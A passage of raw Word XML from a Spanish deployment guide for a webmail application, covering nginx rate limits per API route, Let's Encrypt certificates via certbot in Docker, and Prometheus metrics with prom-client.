            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protección contra fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/auth/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">general</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 r/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Autenticación general</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/emails/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">api</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30 r/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Operaciones de email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/ws/*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WebSocket sin rate limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(SPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">general</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 r/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assets estáticos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La configuración retorna HTTP 429 para rate limits excedidos, con cabecera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Retry-After</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[167]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="227"/>
    <w:bookmarkStart w:id="228" w:name="ssl-lets-encrypt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.3.3 SSL Let’s Encrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Certbot para Let's Encrypt (primera vez)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--rm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> certbot_data:/etc/letsencrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/certbot:/var/www/certbot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  certbot/certbot certonly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--standalone</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webmail6.local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--agree-tos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin@webmail6.local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--non-interactive</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Renovación automática (cron cada 12 horas)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># En docker-compose.prod.yml añadir:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">certbot:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">image:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> certbot/certbot:v3.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_certbot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">volumes:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> certbot_data:/etc/letsencrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/certbot:/var/www/certbot</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">entrypoint:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/bin/sh -c 'trap exit TERM; while :; do certbot renew; sleep 12h; done'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">networks:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_net</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="228"/>
    <w:bookmarkEnd w:id="229"/>
    <w:bookmarkStart w:id="233" w:name="monitoreo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.4 Monitoreo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="230" w:name="prom-client-y-métricas-custom"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.4.1 prom-client y Métricas Custom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">prom-client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es el cliente oficial de Prometheus para Node.js. Incluye métricas por defecto (CPU, memoria, GC, event loop lag) y permite definir métricas custom para el dominio de email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[163]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/config/metrics.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'prom-client'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Métricas por defecto (heap, CPU, event loop)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">collectDefaultMetrics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'webmail6_'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  gcDurationBuckets</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Histograma de latencia HTTP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpDuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Histogram</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'webmail6_http_request_duration_seconds'</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'Duración de requests HTTP en segundos'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'method'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'route'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'status_code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  buckets</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registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Contador de requests</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpRequests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Counter</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'webmail6_http_requests_total'</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'Total de requests HTTP'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'method'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'route'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'status_code'</w:t>
      </w:r>
